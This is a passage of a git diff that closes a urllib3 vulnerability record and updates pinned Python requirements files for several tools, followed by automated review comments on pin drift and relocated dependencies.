"1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - "1.22", - "1.23", - "1.24", - "1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - 
"2.0.6" - ], - "database_specific": { - "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-212.yaml" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" - }, - { - "type": "WEB", - "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" - }, - { - "type": "FIX", - "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" - }, - { - "type": "ARTICLE", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/" - } - ] - } - ], - "groups": [ - { - "ids": [ - "GHSA-g4mx-q9vg-27p4", - "PYSEC-2023-212" - ], - "aliases": [ - "CVE-2023-45803", - "GHSA-g4mx-q9vg-27p4", - "PYSEC-2023-212" - ] - } - ] - } -] \ No newline at end of file diff --git a/requirements/awscli-local-requirements.txt b/requirements/awscli-local-requirements.txt index b57c8bcc..c0145c13 100644 --- a/requirements/awscli-local-requirements.txt +++ b/requirements/awscli-local-requirements.txt @@ -1,7 +1,8 @@ -boto3==1.34.11 -botocore==1.34.11 +boto3==1.34.51 +botocore==1.34.51 jmespath==1.0.1 localstack-client==2.5 python-dateutil==2.8.2 s3transfer==0.10.0 +six==1.16.0 urllib3==2.0.7 diff --git a/requirements/bzt-requirements.txt b/requirements/bzt-requirements.txt index 5b509e52..87e50ba2 100644 --- a/requirements/bzt-requirements.txt +++ b/requirements/bzt-requirements.txt 
@@ -15,19 +15,25 @@ hdrpy==0.3.3 humanize==4.9.0 idna==3.6 influxdb==5.3.1 +lxml==5.1.0 molotov==2.6 msgpack==1.0.7 multidict==6.0.5 multiprocess==0.70.16 progressbar33==2.4 prompt-toolkit==3.0.43 +psutil==5.9.8 python-dateutil==2.8.2 python-engineio==4.9.0 python-socketio==5.11.1 +pytz==2024.1 pyvirtualdisplay==3.0 +pyyaml==6.0.1 rapidfuzz==3.6.1 requests==2.31.0 +setuptools==69.1.1 simple-websocket==1.0.0 +six==1.16.0 terminaltables==3.1.10 urllib3==1.26.17 urwid==2.1.2 diff --git a/requirements/codelimit-requirements.txt b/requirements/codelimit-requirements.txt index da9f3ec7..604a8c97 100644 --- a/requirements/codelimit-requirements.txt +++ b/requirements/codelimit-requirements.txt @@ -2,6 +2,7 @@ aiohttp==3.9.3 aiosignal==1.3.1 attrs==23.2.0 charset-normalizer==3.3.2 +click==8.1.7 colorama==0.4.6 frozenlist==1.4.1 halo==0.0.31 @@ -14,13 +15,16 @@ mdit-py-plugins==0.4.0 mdurl==0.1.2 multidict==6.0.5 plotext==5.2.8 +pygments==2.17.2 pyyaml==6.0.1 requests==2.31.0 rich==13.7.0 +six==1.16.0 spinners==0.0.24 termcolor==2.4.0 textual==0.34.0 typer==0.9.0 +typing-extensions==4.9.0 uc-micro-py==1.0.3 urllib3==2.2.1 yarl==1.9.4 diff --git a/requirements/conda-lock-requirements.txt b/requirements/conda-lock-requirements.txt index ae1245aa..0b69d328 100644 --- a/requirements/conda-lock-requirements.txt +++ b/requirements/conda-lock-requirements.txt 
@@ -7,25 +7,36 @@ click==8.1.7 click-default-group==1.2.4 clikit==0.6.2 crashtest==0.3.1 +distlib==0.3.8 ensureconda==1.4.4 +filelock==3.13.1 gitdb==4.0.11 -gitpython==3.1.41 +gitpython==3.1.42 html5lib==1.1 idna==3.6 +jaraco-classes==3.3.1 jinja2==3.1.3 +keyring==24.3.1 markupsafe==2.1.5 +more-itertools==10.2.0 msgpack==1.0.7 +packaging==23.2 pastel==0.2.1 pkginfo==1.9.6 -pydantic==2.6.1 -pydantic-core==2.16.2 +platformdirs==4.2.0 +pydantic==2.6.3 +pydantic-core==2.16.3 pylev==1.4.0 +pyyaml==6.0.1 requests==2.31.0 ruamel-yaml==0.18.6 ruamel-yaml-clib==0.2.8 -setuptools==69.0.3 +setuptools==69.1.1 +six==1.16.0 smmap==5.0.1 -tomlkit==0.12.3 +tomlkit==0.12.4 toolz==0.12.1 +typing-extensions==4.10.0 urllib3==1.26.18 +virtualenv==20.25.1 webencodings==0.5.1 diff --git a/requirements/cycode-requirements.txt b/requirements/cycode-requirements.txt index a50245cb..36d4505b 100644 --- a/requirements/cycode-requirements.txt +++ b/requirements/cycode-requirements.txt @@ -5,7 +5,7 @@ charset-normalizer==3.3.2 click==8.1.7 colorama==0.4.6 gitdb==4.0.11 -gitpython==3.1.41 +gitpython==3.1.42 idna==3.6 marshmallow==3.20.2 packaging==23.2 diff --git a/requirements/dotbot-requirements.txt b/requirements/dotbot-requirements.txt new file mode 100644 index 00000000..cf39afa6 --- /dev/null +++ b/requirements/dotbot-requirements.txt @@ -0,0 +1 @@ +pyyaml==6.0.1 diff --git a/requirements/esphome-requirements.txt b/requirements/esphome-requirements.txt index 156fdb85..254480d5 100644 --- a/requirements/esphome-requirements.txt +++ b/requirements/esphome-requirements.txt 
@@ -1,21 +1,47 @@ aioesphomeapi==21.0.2 aiohappyeyeballs==2.3.2 +ajsonrpc==1.2.0 +anyio==4.3.0 +argcomplete==3.2.2 bitarray==2.9.2 bitstring==4.1.4 +bottle==0.12.25 chacha20poly1305-reuseable==0.12.1 +chardet==5.2.0 +charset-normalizer==3.3.2 +click==8.1.7 +colorama==0.4.6 ecdsa==0.18.0 esphome-dashboard==20231107.0 esptool==4.7.0 +h11==0.14.0 icmplib==3.0.4 +idna==3.6 ifaddr==0.2.0 intelhex==2.3.0 kconfiglib==13.7.1 +marshmallow==3.21.0 noiseprotocol==0.3.1 +packaging==23.2 paho-mqtt==1.6.1 +platformio==6.1.13 +pyelftools==0.30 +pyparsing==3.1.1 +pyserial==3.5 python-magic==0.4.27 +pyyaml==6.0.1 reedsolo==1.7.0 +requests==2.31.0 +semantic-version==2.10.0 +six==1.16.0 +sniffio==1.3.1 +starlette==0.35.1 +tabulate==0.9.0 tornado==6.4 tzdata==2024.1 tzlocal==5.2 +urllib3==2.2.1 +uvicorn==0.25.0 voluptuous==0.14.1 +wsproto==1.2.0 zeroconf==0.131.0 diff --git a/requirements/fabric-requirements.txt b/requirements/fabric-requirements.txt index 7af2a7ff..af6894ba 100644 --- a/requirements/fabric-requirements.txt +++ b/requirements/fabric-requirements.txt @@ -1,6 +1,7 @@ bcrypt==4.1.2 decorator==5.1.1 deprecated==1.2.14 +invoke==2.2.0 paramiko==3.4.0 pynacl==1.5.0 wrapt==1.16.0 diff --git a/requirements/jc-requirements.txt b/requirements/jc-requirements.txt index 6ce305fd..d3782b84 100644 --- a/requirements/jc-requirements.txt +++ b/requirements/jc-requirements.txt @@ -1,3 +1,4 @@ +pygments==2.17.2 ruamel-yaml==0.18.6 ruamel-yaml-clib==0.2.8 xmltodict==0.13.0 diff --git a/requirements/jello-requirements.txt b/requirements/jello-requirements.txt new file mode 100644 index 00000000..d6f6e4db --- /dev/null +++ b/requirements/jello-requirements.txt @@ -0,0 +1 @@ +pygments==2.17.2 diff --git a/requirements/ocrmypdf-requirements.txt b/requirements/ocrmypdf-requirements.txt index 0c0546e5..93f9e7c9 100644 --- a/requirements/ocrmypdf-requirements.txt +++ b/requirements/ocrmypdf-requirements.txt 
@@ -1,7 +1,14 @@ charset-normalizer==3.3.2 +deprecated==1.2.14 deprecation==2.1.0 +img2pdf==0.5.1 +lxml==5.1.0 markdown-it-py==3.0.0 mdurl==0.1.2 +packaging==23.2 pdfminer-six==20231228 +pikepdf==8.13.0 pluggy==1.4.0 -rich==13.7.0 +pygments==2.17.2 +rich==13.7.1 +wrapt==1.16.0 diff --git a/requirements/openai-whisper-requirements.txt b/requirements/openai-whisper-requirements.txt index cea9166a..fde8b081 100644 --- a/requirements/openai-whisper-requirements.txt +++ b/requirements/openai-whisper-requirements.txt @@ -1,16 +1,10 @@ charset-normalizer==3.3.2 -filelock==3.13.1 -fsspec==2023.10.0 -idna==3.4 -jinja2==3.1.2 -llvmlite==0.41.1 -more-itertools==10.1.0 -mpmath==1.3.0 -networkx==3.2.1 -numba==0.58.1 -regex==2023.10.3 +idna==3.6 +llvmlite==0.42.0 +more-itertools==10.2.0 +numba==0.59.0 +regex==2023.12.25 requests==2.31.0 -sympy==1.12 -tiktoken==0.5.1 -tqdm==4.66.1 -urllib3==2.1.0 +tiktoken==0.6.0 +tqdm==4.66.2 +urllib3==2.2.1 diff --git a/requirements/pytorch-requirements.txt b/requirements/pytorch-requirements.txt index 265c1d8c..51da2217 100644 --- a/requirements/pytorch-requirements.txt +++ b/requirements/pytorch-requirements.txt @@ -1 +1,11 @@ +filelock==3.13.1 +fsspec==2024.2.0 +jinja2==3.1.3 +markupsafe==2.1.5 +mpmath==1.3.0 +networkx==3.2.1 opt-einsum==3.3.0 +pyyaml==6.0.1 +setuptools==69.1.1 +sympy==1.12 +typing-extensions==4.9.0 diff --git a/requirements/torchvision-requirements.txt b/requirements/torchvision-requirements.txt index 68bf0810..221bb752 100644 --- a/requirements/torchvision-requirements.txt +++ b/requirements/torchvision-requirements.txt @@ -1,4 +1,4 @@ -charset-normalizer==3.3.0 -idna==3.4 +charset-normalizer==3.3.2 +idna==3.6 requests==2.31.0 -urllib3==2.0.6 +urllib3==2.2.1
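Review bot: the bzt-requirements.txt hunk leaves `urllib3==1.26.17` untouched while the conda-lock-requirements.txt hunk in this same patch pins `urllib3==1.26.18` and the codelimit, esphome, ocrmypdf, openai-whisper and torchvision hunks all move to `urllib3==2.2.1`; if the generator is meant to refresh pins, bzt should at least be brought to the same 1.26.x patch level as conda-lock, or the file should carry a comment explaining why it is held back. The same hunk also adds `setuptools==69.1.1` and `six==1.16.0` as pinned runtime requirements; confirm these are real transitive dependencies of bzt rather than build-environment leakage, since pinning setuptools in a requirements file is unusual and widens what an audit has to track.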
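Review bot: the esphome-requirements.txt hunk grows the pinned set from 21 to 47 entries, pulling in a web-serving stack (`starlette==0.35.1`, `uvicorn==0.25.0`, `h11==0.14.0`, `wsproto==1.2.0`, `anyio==4.3.0`) and a firmware toolchain (`platformio==6.1.13`, `pyelftools==0.30`, `pyserial==3.5`, `bottle==0.12.25`); a change of this size in an automated "Latest data" commit should be checked against the package's declared dependencies so that the audit covers exactly what the tool installs, and each newly added package should be reviewed against its advisory feed before the pin is accepted rather than after. In particular the version of starlette pinned here is not the latest of its series, so the generator's choice should be confirmed as deliberate.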
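Review bot: the conda-lock-requirements.txt hunk adds `keyring==24.3.1` and `jaraco-classes==3.3.1`, which bring OS credential-store access into the audited surface, plus `virtualenv==20.25.1`, `distlib==0.3.8`, `filelock==3.13.1` and `platformdirs==4.2.0`; these look like transitive dependencies that were previously unlisted, so the corresponding audit should be regenerated for the same commit. Also note the pin drift across files in this patch: `typing-extensions==4.10.0` here versus `typing-extensions==4.9.0` in the codelimit and pytorch hunks, and `gitpython==3.1.42` here and in cycode; consistent cross-file pins make it easier to tell a deliberate hold-back from a stale one.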
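Review bot: the openai-whisper-requirements.txt hunk drops `filelock`, `fsspec`, `jinja2`, `mpmath`, `networkx` and `sympy`, and the very same packages appear as additions in the pytorch-requirements.txt hunk below it, so this is a relocation of torch's transitive dependencies rather than a removal; the commit message ("Latest data") does not say so, and a reader of the whisper file alone would conclude its dependency surface shrank. Suggest either a note in the commit body describing the split, or keeping the whisper list complete, since whatever consumes these files per tool will otherwise stop auditing those packages for whisper.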
